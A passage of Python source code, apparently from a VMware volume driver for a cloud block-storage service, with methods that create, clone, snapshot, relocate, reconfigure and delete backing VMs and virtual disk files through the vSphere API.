create_spec.memoryMB = 128
create_spec.files = vm_file_info
# Set the default hardware version to a compatible version supported by
# vSphere 5.0. This will ensure that the backing VM can be migrated
# without any incompatibility issues in a mixed cluster of ESX hosts
# with versions 5.0 or above.
create_spec.version = self._vmx_version or "vmx-08"
if profileId:
vmProfile = cf.create('ns0:VirtualMachineDefinedProfileSpec')
vmProfile.profileId = profileId
create_spec.vmProfile = [vmProfile]
if extra_config:
if BACKING_UUID_KEY in extra_config:
create_spec.instanceUuid = extra_config.pop(BACKING_UUID_KEY)
create_spec.extraConfig = self._get_extra_config_option_values(
extra_config)
create_spec.managedBy = self._create_managed_by_info()
return create_spec
def get_create_spec(self, name, size_kb, disk_type, ds_name,
profile_id=None, adapter_type='lsiLogic',
extra_config=None):
"""Return spec for creating backing with a single disk.
:param name: name of the backing
:param size_kb: disk size in KB
:param disk_type: disk provisioning type
:param ds_name: datastore name where the disk is to be provisioned
:param profile_id: storage policy profile identification
:param adapter_type: disk adapter type
:param extra_config: key-value pairs to be written to backing's
extra-config
:return: spec for creation
"""
create_spec = self._get_create_spec_disk_less(
name, ds_name, profileId=profile_id, extra_config=extra_config)
create_spec.deviceChange = self._create_specs_for_disk_add(
size_kb, disk_type, adapter_type, profile_id)
return create_spec
def _create_backing_int(self, folder, resource_pool, host, create_spec):
"""Helper for create backing methods."""
LOG.debug("Creating volume backing with spec: %s.", create_spec)
task = self._session.invoke_api(self._session.vim, 'CreateVM_Task',
folder, config=create_spec,
pool=resource_pool, host=host)
task_info = self._session.wait_for_task(task)
backing = task_info.result
LOG.info("Successfully created volume backing: %s.", backing)
return backing
def create_backing(self, name, size_kb, disk_type, folder, resource_pool,
host, ds_name, profileId=None, adapter_type='lsiLogic',
extra_config=None):
"""Create backing for the volume.
Creates a VM with one VMDK based on the given inputs.
:param name: Name of the backing
:param size_kb: Size in KB of the backing
:param disk_type: VMDK type for the disk
:param folder: Folder, where to create the backing under
:param resource_pool: Resource pool reference
:param host: Host reference
:param ds_name: Datastore name where the disk is to be provisioned
:param profileId: Storage profile ID to be associated with backing
:param adapter_type: Disk adapter type
:param extra_config: Key-value pairs to be written to backing's
extra-config
:return: Reference to the created backing entity
"""
LOG.debug("Creating volume backing with name: %(name)s "
"disk_type: %(disk_type)s size_kb: %(size_kb)s "
"adapter_type: %(adapter_type)s profileId: %(profile)s at "
"folder: %(folder)s resource_pool: %(resource_pool)s "
"host: %(host)s datastore_name: %(ds_name)s.",
{'name': name, 'disk_type': disk_type, 'size_kb': size_kb,
'folder': folder, 'resource_pool': resource_pool,
'ds_name': ds_name, 'profile': profileId, 'host': host,
'adapter_type': adapter_type})
create_spec = self.get_create_spec(
name, size_kb, disk_type, ds_name, profile_id=profileId,
adapter_type=adapter_type, extra_config=extra_config)
return self._create_backing_int(folder, resource_pool, host,
create_spec)
def create_backing_disk_less(self, name, folder, resource_pool,
host, ds_name, profileId=None,
extra_config=None):
"""Create disk-less volume backing.
This type of backing is useful for creating volume from image. The
downloaded image from the image service can be copied to a virtual
disk of desired provisioning type and added to the backing VM.
:param name: Name of the backing
:param folder: Folder where the backing is created
:param resource_pool: Resource pool reference
:param host: Host reference
:param ds_name: Name of the datastore used for VM storage
:param profileId: Storage profile ID to be associated with backing
:param extra_config: Key-value pairs to be written to backing's
extra-config
:return: Reference to the created backing entity
"""
LOG.debug("Creating disk-less volume backing with name: %(name)s "
"profileId: %(profile)s at folder: %(folder)s "
"resource pool: %(resource_pool)s host: %(host)s "
"datastore_name: %(ds_name)s.",
{'name': name, 'profile': profileId, 'folder': folder,
'resource_pool': resource_pool, 'host': host,
'ds_name': ds_name})
create_spec = self._get_create_spec_disk_less(
name, ds_name, profileId=profileId, extra_config=extra_config)
return self._create_backing_int(folder, resource_pool, host,
create_spec)
def get_datastore(self, backing):
"""Get datastore where the backing resides.
:param backing: Reference to the backing
:return: Datastore reference to which the backing belongs
"""
return self._session.invoke_api(vim_util, 'get_object_property',
self._session.vim, backing,
'datastore').ManagedObjectReference[0]
def get_summary(self, datastore):
"""Get datastore summary.
:param datastore: Reference to the datastore
:return: 'summary' property of the datastore
"""
return self._session.invoke_api(vim_util, 'get_object_property',
self._session.vim, datastore,
'summary')
def _create_relocate_spec_disk_locator(self, datastore, disk_type,
disk_device):
"""Creates spec for disk type conversion during relocate."""
cf = self._session.vim.client.factory
disk_locator = cf.create("ns0:VirtualMachineRelocateSpecDiskLocator")
disk_locator.datastore = datastore
disk_locator.diskId = disk_device.key
disk_locator.diskBackingInfo = self._create_disk_backing(disk_type,
None)
return disk_locator
def _get_relocate_spec(self, datastore, resource_pool, host,
disk_move_type, disk_type=None, disk_device=None):
"""Return spec for relocating volume backing.
:param datastore: Reference to the datastore
:param resource_pool: Reference to the resource pool
:param host: Reference to the host
:param disk_move_type: Disk move type option
:param disk_type: Destination disk type
:param disk_device: Virtual device corresponding to the disk
:return: Spec for relocation
"""
cf = self._session.vim.client.factory
relocate_spec = cf.create('ns0:VirtualMachineRelocateSpec')
relocate_spec.datastore = datastore
relocate_spec.pool = resource_pool
relocate_spec.host = host
relocate_spec.diskMoveType = disk_move_type
if disk_type is not None and disk_device is not None:
disk_locator = self._create_relocate_spec_disk_locator(datastore,
disk_type,
disk_device)
relocate_spec.disk = [disk_locator]
LOG.debug("Spec for relocating the backing: %s.", relocate_spec)
return relocate_spec
def relocate_backing(
self, backing, datastore, resource_pool, host, disk_type=None):
"""Relocates backing to the input datastore and resource pool.
The implementation uses moveAllDiskBackingsAndAllowSharing disk move
type.
:param backing: Reference to the backing
:param datastore: Reference to the datastore
:param resource_pool: Reference to the resource pool
:param host: Reference to the host
:param disk_type: destination disk type
"""
LOG.debug("Relocating backing: %(backing)s to datastore: %(ds)s "
"and resource pool: %(rp)s with destination disk type: "
"%(disk_type)s.",
{'backing': backing,
'ds': datastore,
'rp': resource_pool,
'disk_type': disk_type})
# Relocate the volume backing
disk_move_type = 'moveAllDiskBackingsAndAllowSharing'
disk_device = None
if disk_type is not None:
disk_device = self._get_disk_device(backing)
relocate_spec = self._get_relocate_spec(datastore, resource_pool, host,
disk_move_type, disk_type,
disk_device)
task = self._session.invoke_api(self._session.vim, 'RelocateVM_Task',
backing, spec=relocate_spec)
LOG.debug("Initiated relocation of volume backing: %s.", backing)
self._session.wait_for_task(task)
LOG.info("Successfully relocated volume backing: %(backing)s "
"to datastore: %(ds)s and resource pool: %(rp)s.",
{'backing': backing, 'ds': datastore, 'rp': resource_pool})
def move_backing_to_folder(self, backing, folder):
"""Move the volume backing to the folder.
:param backing: Reference to the backing
:param folder: Reference to the folder
"""
LOG.debug("Moving backing: %(backing)s to folder: %(fol)s.",
{'backing': backing, 'fol': folder})
task = self._session.invoke_api(self._session.vim,
'MoveIntoFolder_Task', folder,
list=[backing])
LOG.debug("Initiated move of volume backing: %(backing)s into the "
"folder: %(fol)s.", {'backing': backing, 'fol': folder})
self._session.wait_for_task(task)
LOG.info("Successfully moved volume "
"backing: %(backing)s into the "
"folder: %(fol)s.", {'backing': backing, 'fol': folder})
def create_snapshot(self, backing, name, description, quiesce=False):
"""Create snapshot of the backing with given name and description.
:param backing: Reference to the backing entity
:param name: Snapshot name
:param description: Snapshot description
:param quiesce: Whether to quiesce the backing when taking snapshot
:return: Created snapshot entity reference
"""
LOG.debug("Snapshoting backing: %(backing)s with name: %(name)s.",
{'backing': backing, 'name': name})
task = self._session.invoke_api(self._session.vim,
'CreateSnapshot_Task',
backing, name=name,
description=description,
memory=False, quiesce=quiesce)
LOG.debug("Initiated snapshot of volume backing: %(backing)s "
"named: %(name)s.", {'backing': backing, 'name': name})
task_info = self._session.wait_for_task(task)
snapshot = task_info.result
LOG.info("Successfully created snapshot: %(snap)s for volume "
"backing: %(backing)s.",
{'snap': snapshot, 'backing': backing})
return snapshot
@staticmethod
def _get_snapshot_from_tree(name, root):
"""Get snapshot by name from the snapshot tree root.
:param name: Snapshot name
:param root: Current root node in the snapshot tree
:return: None in the snapshot tree with given snapshot name
"""
if not root:
return None
if root.name == name:
return root.snapshot
if (not hasattr(root, 'childSnapshotList') or
not root.childSnapshotList):
# When root does not have children, the childSnapshotList attr
# is missing sometime. Adding an additional check.
return None
for node in root.childSnapshotList:
snapshot = VMwareVolumeOps._get_snapshot_from_tree(name, node)
if snapshot:
return snapshot
def get_snapshot(self, backing, name):
"""Get snapshot of the backing with given name.
:param backing: Reference to the backing entity
:param name: Snapshot name
:return: Snapshot entity of the backing with given name
"""
snapshot = self._session.invoke_api(vim_util, 'get_object_property',
self._session.vim, backing,
'snapshot')
if not snapshot or not snapshot.rootSnapshotList:
return None
for root in snapshot.rootSnapshotList:
return VMwareVolumeOps._get_snapshot_from_tree(name, root)
def snapshot_exists(self, backing):
"""Check if the given backing contains snapshots."""
snapshot = self._session.invoke_api(vim_util, 'get_object_property',
self._session.vim, backing,
'snapshot')
if snapshot is None or snapshot.rootSnapshotList is None:
return False
return len(snapshot.rootSnapshotList) != 0
def delete_snapshot(self, backing, name):
"""Delete a given snapshot from volume backing.
:param backing: Reference to the backing entity
:param name: Snapshot name
"""
LOG.debug("Deleting the snapshot: %(name)s from backing: "
"%(backing)s.",
{'name': name, 'backing': backing})
snapshot = self.get_snapshot(backing, name)
if not snapshot:
LOG.info("Did not find the snapshot: %(name)s for backing: "
"%(backing)s. Need not delete anything.",
{'name': name, 'backing': backing})
return
task = self._session.invoke_api(self._session.vim,
'RemoveSnapshot_Task',
snapshot, removeChildren=False)
LOG.debug("Initiated snapshot: %(name)s deletion for backing: "
"%(backing)s.",
{'name': name, 'backing': backing})
self._session.wait_for_task(task)
LOG.info("Successfully deleted snapshot: %(name)s of backing: "
"%(backing)s.", {'backing': backing, 'name': name})
def revert_to_snapshot(self, backing, name):
LOG.debug("Revert to snapshot: %(name)s of backing: %(backing)s.",
{'name': name, 'backing': backing})
snapshot = self.get_snapshot(backing, name)
if not snapshot:
raise vmdk_exceptions.SnapshotNotFoundException(
name=name)
task = self._session.invoke_api(self._session.vim,
'RevertToSnapshot_Task',
snapshot)
self._session.wait_for_task(task)
def _get_folder(self, backing):
"""Get parent folder of the backing.
:param backing: Reference to the backing entity
:return: Reference to parent folder of the backing entity
"""
return self._get_parent(backing, 'Folder')
def _get_clone_spec(self, datastore, disk_move_type, snapshot, backing,
disk_type, host=None, resource_pool=None,
extra_config=None, disks_to_clone=None):
"""Get the clone spec.
:param datastore: Reference to datastore
:param disk_move_type: Disk move type
:param snapshot: Reference to snapshot
:param backing: Source backing VM
:param disk_type: Disk type of clone
:param host: Target host
:param resource_pool: Target resource pool
:param extra_config: Key-value pairs to be written to backing's
extra-config
:param disks_to_clone: UUIDs of disks to clone
:return: Clone spec
"""
if disk_type is not None:
disk_device = self._get_disk_device(backing)
else:
disk_device = None
relocate_spec = self._get_relocate_spec(datastore, resource_pool, host,
disk_move_type, disk_type,
disk_device)
cf = self._session.vim.client.factory
clone_spec = cf.create('ns0:VirtualMachineCloneSpec')
clone_spec.location = relocate_spec
clone_spec.powerOn = False
clone_spec.template = False
clone_spec.snapshot = snapshot
config_spec = cf.create('ns0:VirtualMachineConfigSpec')
config_spec.managedBy = self._create_managed_by_info()
clone_spec.config = config_spec
if extra_config:
if BACKING_UUID_KEY in extra_config:
config_spec.instanceUuid = extra_config.pop(BACKING_UUID_KEY)
config_spec.extraConfig = self._get_extra_config_option_values(
extra_config)
if disks_to_clone:
config_spec.deviceChange = (
self._create_device_change_for_disk_removal(
backing, disks_to_clone))
LOG.debug("Spec for cloning the backing: %s.", clone_spec)
return clone_spec
def _create_device_change_for_disk_removal(self, backing, disks_to_clone):
disk_devices = self._get_disk_devices(backing)
device_change = []
for device in disk_devices:
if device.backing.uuid not in disks_to_clone:
device_change.append(self._create_spec_for_disk_remove(device))
return device_change
def clone_backing(self, name, backing, snapshot, clone_type, datastore,
disk_type=None, host=None, resource_pool=None,
extra_config=None, folder=None, disks_to_clone=None):
"""Clone backing.
If the clone_type is 'full', then a full clone of the source volume
backing will be created. Else, if it is 'linked', then a linked clone
of the source volume backing will be created.
:param name: Name for the clone
:param backing: Reference to the backing entity
:param snapshot: Snapshot point from which the clone should be done
:param clone_type: Whether a full clone or linked clone is to be made
:param datastore: Reference to the datastore entity
:param disk_type: Disk type of the clone
:param host: Target host
:param resource_pool: Target resource pool
:param extra_config: Key-value pairs to be written to backing's
extra-config
:param folder: The location of the clone
:param disks_to_clone: UUIDs of disks to clone
"""
LOG.debug("Creating a clone of backing: %(back)s, named: %(name)s, "
"clone type: %(type)s from snapshot: %(snap)s on "
"resource pool: %(resource_pool)s, host: %(host)s, "
"datastore: %(ds)s with disk type: %(disk_type)s.",
{'back': backing, 'name': name, 'type': clone_type,
'snap': snapshot, 'ds': datastore, 'disk_type': disk_type,
'host': host, 'resource_pool': resource_pool})
if folder is None:
# Use source folder as the location of the clone.
folder = self._get_folder(backing)
if clone_type == LINKED_CLONE_TYPE:
disk_move_type = 'createNewChildDiskBacking'
else:
disk_move_type = 'moveAllDiskBackingsAndDisallowSharing'
clone_spec = self._get_clone_spec(
datastore, disk_move_type, snapshot, backing, disk_type, host=host,
resource_pool=resource_pool, extra_config=extra_config,
disks_to_clone=disks_to_clone)
task = self._session.invoke_api(self._session.vim, 'CloneVM_Task',
backing, folder=folder, name=name,
spec=clone_spec)
LOG.debug("Initiated clone of backing: %s.", name)
task_info = self._session.wait_for_task(task)
new_backing = task_info.result
LOG.info("Successfully created clone: %s.", new_backing)
return new_backing
def _reconfigure_backing(self, backing, reconfig_spec):
"""Reconfigure backing VM with the given spec."""
LOG.debug("Reconfiguring backing VM: %(backing)s with spec: %(spec)s.",
{'backing': backing,
'spec': reconfig_spec})
reconfig_task = self._session.invoke_api(self._session.vim,
"ReconfigVM_Task",
backing,
spec=reconfig_spec)
LOG.debug("Task: %s created for reconfiguring backing VM.",
reconfig_task)
self._session.wait_for_task(reconfig_task)
def _get_controller(self, backing, adapter_type):
devices = self._session.invoke_api(vim_util,
'get_object_property',
self._session.vim,
backing,
'config.hardware.device')
controller_type = ControllerType.get_controller_type(adapter_type)
for device in devices:
if device.__class__.__name__ == controller_type:
return device
def attach_disk_to_backing(self, backing, size_in_kb, disk_type,
adapter_type, profile_id, vmdk_ds_file_path):
"""Attach an existing virtual disk to the backing VM.
:param backing: reference to the backing VM
:param size_in_kb: disk size in KB
:param disk_type: virtual disk type
:param adapter_type: disk adapter type
:param profile_id: storage policy profile identification
:param vmdk_ds_file_path: datastore file path of the virtual disk to
be attached
"""
LOG.debug("Reconfiguring backing VM: %(backing)s to add new disk: "
"%(path)s with size (KB): %(size)d and adapter type: "
"%(adapter_type)s.",
{'backing': backing,
'path': vmdk_ds_file_path,
'size': size_in_kb,
'adapter_type': adapter_type})
cf = self._session.vim.client.factory
reconfig_spec = cf.create('ns0:VirtualMachineConfigSpec')
controller = self._get_controller(backing, adapter_type)
if controller:
disk_spec = self._create_virtual_disk_config_spec(
size_in_kb,
disk_type,
controller.key,
profile_id,
vmdk_ds_file_path)
specs = [disk_spec]
else:
specs = self._create_specs_for_disk_add(
size_in_kb,
disk_type,
adapter_type,
profile_id,
vmdk_ds_file_path=vmdk_ds_file_path)
reconfig_spec.deviceChange = specs
self._reconfigure_backing(backing, reconfig_spec)
LOG.debug("Backing VM: %s reconfigured with new disk.", backing)
def _create_spec_for_disk_remove(self, disk_device):
cf = self._session.vim.client.factory
disk_spec = cf.create('ns0:VirtualDeviceConfigSpec')
disk_spec.operation = 'remove'
disk_spec.device = disk_device
return disk_spec
def detach_disk_from_backing(self, backing, disk_device):
"""Detach the given disk from backing."""
LOG.debug("Reconfiguring backing VM: %(backing)s to remove disk: "
"%(disk_device)s.",
{'backing': backing, 'disk_device': disk_device})
cf = self._session.vim.client.factory
reconfig_spec = cf.create('ns0:VirtualMachineConfigSpec')
spec = self._create_spec_for_disk_remove(disk_device)
reconfig_spec.deviceChange = [spec]
self._reconfigure_backing(backing, reconfig_spec)
def rename_backing(self, backing, new_name):
"""Rename backing VM.
:param backing: VM to be renamed
:param new_name: new VM name
"""
LOG.info("Renaming backing VM: %(backing)s to %(new_name)s.",
{'backing': backing,
'new_name': new_name})
rename_task = self._session.invoke_api(self._session.vim,
"Rename_Task",
backing,
newName=new_name)
LOG.debug("Task: %s created for renaming VM.", rename_task)
self._session.wait_for_task(rename_task)
LOG.info("Backing VM: %(backing)s renamed to %(new_name)s.",
{'backing': backing,
'new_name': new_name})
def change_backing_profile(self, backing, profile_id):
"""Change storage profile of the backing VM.
The current profile is removed if the new profile is None.
"""
LOG.debug("Reconfiguring backing VM: %(backing)s to change profile to:"
" %(profile)s.",
{'backing': backing,
'profile': profile_id})
cf = self._session.vim.client.factory
if profile_id is None:
vm_profile = cf.create('ns0:VirtualMachineEmptyProfileSpec')
else:
vm_profile = cf.create('ns0:VirtualMachineDefinedProfileSpec')
vm_profile.profileId = profile_id.uniqueId
reconfig_spec = cf.create('ns0:VirtualMachineConfigSpec')
reconfig_spec.vmProfile = [vm_profile]
disk_device = self._get_disk_device(backing)
disk_spec = cf.create('ns0:VirtualDeviceConfigSpec')
disk_spec.device = disk_device
disk_spec.operation = 'edit'
disk_spec.profile = [vm_profile]
reconfig_spec.deviceChange = [disk_spec]
self._reconfigure_backing(backing, reconfig_spec)
LOG.debug("Backing VM: %(backing)s reconfigured with new profile: "
"%(profile)s.",
{'backing': backing,
'profile': profile_id})
def update_backing_disk_uuid(self, backing, disk_uuid):
"""Update backing VM's disk UUID.
:param backing: Reference to backing VM
:param disk_uuid: New disk UUID
"""
LOG.debug("Reconfiguring backing VM: %(backing)s to change disk UUID "
"to: %(disk_uuid)s.",
{'backing': backing,
'disk_uuid': disk_uuid})
disk_device = self._get_disk_device(backing)
disk_device.backing.uuid = disk_uuid
cf = self._session.vim.client.factory
disk_spec = cf.create('ns0:VirtualDeviceConfigSpec')
disk_spec.device = disk_device
disk_spec.operation = 'edit'
reconfig_spec = cf.create('ns0:VirtualMachineConfigSpec')
reconfig_spec.deviceChange = [disk_spec]
self._reconfigure_backing(backing, reconfig_spec)
LOG.debug("Backing VM: %(backing)s reconfigured with new disk UUID: "
"%(disk_uuid)s.",
{'backing': backing,
'disk_uuid': disk_uuid})
def update_backing_extra_config(self, backing, extra_config):
cf = self._session.vim.client.factory
reconfig_spec = cf.create('ns0:VirtualMachineConfigSpec')
if BACKING_UUID_KEY in extra_config:
reconfig_spec.instanceUuid = extra_config.pop(BACKING_UUID_KEY)
reconfig_spec.extraConfig = self._get_extra_config_option_values(
extra_config)
self._reconfigure_backing(backing, reconfig_spec)
LOG.debug("Backing: %(backing)s reconfigured with extra config: "
"%(extra_config)s.",
{'backing': backing,
'extra_config': extra_config})
def update_backing_uuid(self, backing, uuid):
cf = self._session.vim.client.factory
reconfig_spec = cf.create('ns0:VirtualMachineConfigSpec')
reconfig_spec.instanceUuid = uuid
self._reconfigure_backing(backing, reconfig_spec)
LOG.debug("Backing: %(backing)s reconfigured with uuid: %(uuid)s.",
{'backing': backing,
'uuid': uuid})
def delete_file(self, file_path, datacenter=None):
"""Delete file or folder on the datastore.
:param file_path: Datastore path of the file or folder
"""
LOG.debug("Deleting file: %(file)s under datacenter: %(dc)s.",
{'file': file_path, 'dc': datacenter})
fileManager = self._session.vim.service_content.fileManager
task = self._session.invoke_api(self._session.vim,
'DeleteDatastoreFile_Task',
fileManager,
name=file_path,
datacenter=datacenter)
LOG.debug("Initiated deletion via task: %s.", task)
self._session.wait_for_task(task)
LOG.info("Successfully deleted file: %s.", file_path)
def create_datastore_folder(self, ds_name, folder_path, datacenter):
"""Creates a datastore folder.
This method returns silently if the folder already exists.
:param ds_name: datastore name
:param folder_path: path of folder to create
:param datacenter: datacenter of target datastore
"""
fileManager = self._session.vim.service_content.fileManager
ds_folder_path = "[%s] %s" % (ds_name, folder_path)
LOG.debug("Creating datastore folder: %s.", ds_folder_path)
try:
self._session.invoke_api(self._session.vim,
'MakeDirectory',
fileManager,
name=ds_folder_path,
datacenter=datacenter)
LOG.info("Created datastore folder: %s.", folder_path)
except exceptions.FileAlreadyExistsException:
LOG.debug("Datastore folder: %s already exists.", folder_path)
def get_path_name(self, backing):
"""Get path name of the backing.
:param backing: Reference to the backing entity
:return: Path name of the backing
"""
return self._session.invoke_api(vim_util, 'get_object_property',
self._session.vim, backing,
'config.files').vmPathName
def get_entity_name(self, entity):
"""Get name of the managed entity.
:param entity: Reference to the entity
:return: Name of the managed entity
"""
return self._session.invoke_api(vim_util, 'get_object_property',
self._session.vim, entity, 'name')
def _get_disk_device(self, backing):
"""Get the virtual device corresponding to disk."""
hardware_devices = self._session.invoke_api(vim_util,
'get_object_property',
self._session.vim,
backing,
'config.hardware.device')
if hardware_devices.__class__.__name__ == "ArrayOfVirtualDevice":
hardware_devices = hardware_devices.VirtualDevice
for device in hardware_devices:
if device.__class__.__name__ == "VirtualDisk":
return device
LOG.error("Virtual disk device of backing: %s not found.", backing)
raise vmdk_exceptions.VirtualDiskNotFoundException()
def get_vmdk_path(self, backing):
"""Get the vmdk file name of the backing.
The vmdk file path of the backing returned is of the form:
"[datastore1] my_folder/my_vm.vmdk"
:param backing: Reference to the backing
:return: VMDK file path of the backing
"""
disk_device = self._get_disk_device(backing)
backing = disk_device.backing
if backing.__class__.__name__ != "VirtualDiskFlatVer2BackingInfo":
msg = _("Invalid disk backing: %s.") % backing.__class__.__name__
LOG.error(msg)
raise AssertionError(msg)
return backing.fileName
def get_disk_size(self, backing):
"""Get disk size of the backing.
:param backing: backing VM reference
:return: disk size in bytes
"""
disk_device = self._get_disk_device(backing)
return disk_device.capacityInKB * units.Ki
def _get_virtual_disk_create_spec(self, size_in_kb, adapter_type,
disk_type):
"""Return spec for file-backed virtual disk creation."""
cf = self._session.vim.client.factory
spec = cf.create('ns0:FileBackedVirtualDiskSpec')
spec.capacityKb = size_in_kb
spec.adapterType = VirtualDiskAdapterType.get_adapter_type(
adapter_type)
spec.diskType = VirtualDiskType.get_virtual_disk_type(disk_type)
return spec
def create_virtual_disk(self, dc_ref, vmdk_ds_file_path, size_in_kb,
adapter_type='busLogic', disk_type='preallocated'):
"""Create virtual disk with the given settings.
:param dc_ref: datacenter reference
:param vmdk_ds_file_path: datastore file path of the virtual disk
:param size_in_kb: disk size in KB
:param adapter_type: disk adapter type
:param disk_type: vmdk type
"""
virtual_disk_spec = self._get_virtual_disk_create_spec(size_in_kb,
adapter_type,
disk_type)
LOG.debug("Creating virtual disk with spec: %s.", virtual_disk_spec)
disk_manager = self._session.vim.service_content.virtualDiskManager
task = self._session.invoke_api(self._session.vim,
'CreateVirtualDisk_Task',
disk_manager,
name=vmdk_ds_file_path,
datacenter=dc_ref,
spec=virtual_disk_spec)
LOG.debug("Task: %s created for virtual disk creation.", task)
self._session.wait_for_task(task)
LOG.debug("Created virtual disk with spec: %s.", virtual_disk_spec)
def create_flat_extent_virtual_disk_descriptor(
self, dc_ref, path, size_in_kb, adapter_type, disk_type):
"""Create descriptor for a single flat extent virtual disk.
To create the descriptor, we create a virtual disk and delete its flat
extent.
:param dc_ref: reference to the datacenter
:param path: descriptor datastore file path
:param size_in_kb: size of the virtual disk in KB
:param adapter_type: virtual disk adapter type
:param disk_type: type of the virtual disk
"""
LOG.debug("Creating descriptor: %(path)s with size (KB): %(size)s, "
"adapter_type: %(adapter_type)s and disk_type: "
"%(disk_type)s.",
{'path': path.get_descriptor_ds_file_path(),
'size': size_in_kb,
'adapter_type': adapter_type,
'disk_type': disk_type
})
self.create_virtual_disk(dc_ref, path.get_descriptor_ds_file_path(),
size_in_kb, adapter_type, disk_type)
self.delete_file(path.get_flat_extent_ds_file_path(), dc_ref)
LOG.debug("Created descriptor: %s.",
path.get_descriptor_ds_file_path())
def copy_vmdk_file(self, src_dc_ref, src_vmdk_file_path,
dest_vmdk_file_path, dest_dc_ref=None):
"""Copy contents of the src vmdk file to dest vmdk file.
:param src_dc_ref: Reference to datacenter containing src datastore
:param src_vmdk_file_path: Source vmdk file path
:param dest_vmdk_file_path: Destination vmdk file path
:param dest_dc_ref: Reference to datacenter of dest datastore.
If unspecified, source datacenter is used.
"""
LOG.debug('Copying disk: %(src)s to %(dest)s.',
{'src': src_vmdk_file_path,
'dest': dest_vmdk_file_path})
dest_dc_ref = dest_dc_ref or src_dc_ref
diskMgr = self._session.vim.service_content.virtualDiskManager
task = self._session.invoke_api(self._session.vim,
'CopyVirtualDisk_Task',
diskMgr,
sourceName=src_vmdk_file_path,
sourceDatacenter=src_dc_ref,
destName=dest_vmdk_file_path,
destDatacenter=dest_dc_ref,
force=True)
LOG.debug("Initiated copying disk data via task: %s.", task)
self._session.wait_for_task(task)
LOG.info("Successfully copied disk at: %(src)s to: %(dest)s.",
{'src': src_vmdk_file_path, 'dest': dest_vmdk_file_path})
def move_vmdk_file(self, src_dc_ref, src_vmdk_file_path,
dest_vmdk_file_path, dest_dc_ref=None):
"""Move the given vmdk file to another datastore location.
:param src_dc_ref: Reference to datacenter containing src datastore
:param src_vmdk_file_path: Source vmdk file path
:param dest_vmdk_file_path: Destination vmdk file path
:param dest_dc_ref: Reference to datacenter of dest datastore.
If unspecified, source datacenter is used.
"""
LOG.debug('Moving disk: %(src)s to %(dest)s.',
{'src': src_vmdk_file_path, 'dest': dest_vmdk_file_path})
dest_dc_ref = dest_dc_ref or src_dc_ref
diskMgr = self._session.vim.service_content.virtualDiskManager
task = self._session.invoke_api(self._session.vim,
'MoveVirtualDisk_Task',
diskMgr,
sourceName=src_vmdk_file_path,
sourceDatacenter=src_dc_ref,
destName=dest_vmdk_file_path,
destDatacenter=dest_dc_ref,
force=True)
self._session.wait_for_task(task)
def copy_datastore_file(self, vsphere_url, dest_dc_ref, dest_ds_file_path):
"""Copy file to datastore location.
:param vsphere_url: vsphere URL of the file
:param dest_dc_ref: Reference to destination datacenter
:param dest_file_path: Destination datastore file path
"""
LOG.debug("Copying file: %(vsphere_url)s to %(path)s.",
{'vsphere_url': vsphere_url,
'path': dest_ds_file_path})
location_url = ds_obj.DatastoreURL.urlparse(vsphere_url)
src_path = ds_obj.DatastorePath(location_url.datastore_name,
location_url.path)
src_dc_ref = self.get_entity_by_inventory_path(
location_url.datacenter_path)
task = self._session.invoke_api(
self._session.vim,
'CopyDatastoreFile_Task',
self._session.vim.service_content.fileManager,
sourceName=six.text_type(src_path),
sourceDatacenter=src_dc_ref,
destinationName=dest_ds_file_path,
destinationDatacenter=dest_dc_ref)
self._session.wait_for_task(task)
def delete_vmdk_file(self, vmdk_file_path, dc_ref):
"""Delete given vmdk files.
:param vmdk_file_path: VMDK file path to be deleted
:param dc_ref: Reference to datacenter that contains this VMDK file
"""
LOG.debug("Deleting vmdk file: %s.", vmdk_file_path)
diskMgr = self._session.vim.service_content.virtualDiskManager
task = self._session.invoke_api(self._session.vim,
'DeleteVirtualDisk_Task',
diskMgr,
name=vmdk_file_path,
datacenter=dc_ref)
LOG.debug("Initiated deleting vmdk file via task: %s.", task)
self._session.wait_for_task(task)
LOG.info("Deleted vmdk file: %s.", vmdk_file_path)
def _get_all_clusters(self):
clusters = {}
retrieve_result = self._session.invoke_api(vim_util, 'get_objects',
self._session.vim,
'ClusterComputeResource',
self._max_objects)
while retrieve_result:
if retrieve_result.objects:
for cluster in retrieve_result.objects:
name = urllib.parse.unquote(cluster.propSet[0].val)
clusters[name] = cluster.obj
retrieve_result = self.continue_retrieval(retrieve_result)
return clusters
def get_cluster_refs(self, names):
"""Get references to given clusters.
:param names: list of cluster names
:return: Dictionary of cluster names to references
"""
clusters_ref = {}
clusters = self._get_all_clusters()
for name in names:
if name not in clusters:
LOG.error("Compute cluster: %s not found.", name)
raise vmdk_exceptions.ClusterNotFoundException(cluster=name)
clusters_ref[name] = clusters[name]
return clusters_ref
def get_cluster_hosts(self, cluster):
"""Get hosts in the given cluster.
:param cluster: cluster reference
:return: references to hosts in the cluster
"""
hosts = self._session.invoke_api(vim_util,
'get_object_property',
self._session.vim,
cluster,
'host')
host_refs = []
if hosts and hosts.ManagedObjectReference:
host_refs.extend(hosts.ManagedObjectReference)
return host_refs
def get_entity_by_inventory_path(self, path):
"""Returns the managed object identified by the given inventory path.
:param path: Inventory path
:return: Reference to the managed object
"""
return self._session.invoke_api(
self._session.vim,
"FindByInventoryPath",
self._session.vim.service_content.searchIndex,
inventoryPath=path)
def get_inventory_path(self, entity):
return self._session.invoke_api(
vim_util, 'get_inventory_path', self._session.vim, entity)
def _get_disk_devices(self, vm):
disk_devices = []
hardware_devices = self._session.invoke_api(vim_util,
'get_object_property',
self._session.vim,
vm,
'config.hardware.device')
if hardware_devices.__class__.__name__ == "ArrayOfVirtualDevice":
hardware_devices = hardware_devices.VirtualDevice
for device in hardware_devices:
if device.__class__.__name__ == "VirtualDisk":
disk_devices.append(device)
return disk_devices
def get_disk_device(self, vm, vmdk_path):
"""Get the disk device of the VM which corresponds to the given path.
:param vm: VM reference
:param vmdk_path: Datastore path of virtual disk
:return: Matching disk device
"""
disk_devices = self._get_disk_devices(vm)
for disk_device in disk_devices:
backing = disk_device.backing
if (backing.__class__.__name__ == "VirtualDiskFlatVer2BackingInfo"
and backing.fileName == vmdk_path):
return disk_device
def mark_backing_as_template(self, backing):
LOG.debug("Marking backing: %s as template.", backing)
self._session.invoke_api(self._session.vim, 'MarkAsTemplate', backing)
def _create_fcd_backing_spec(self, disk_type, ds_ref):
backing_spec = self._session.vim.client.factory.create(
'ns0:VslmCreateSpecDiskFileBackingSpec')
if disk_type == VirtualDiskType.PREALLOCATED:
disk_type = 'lazyZeroedThick'
backing_spec.provisioningType = disk_type
backing_spec.datastore = ds_ref
return backing_spec
def create_fcd(self, name, size_mb, ds_ref, disk_type):
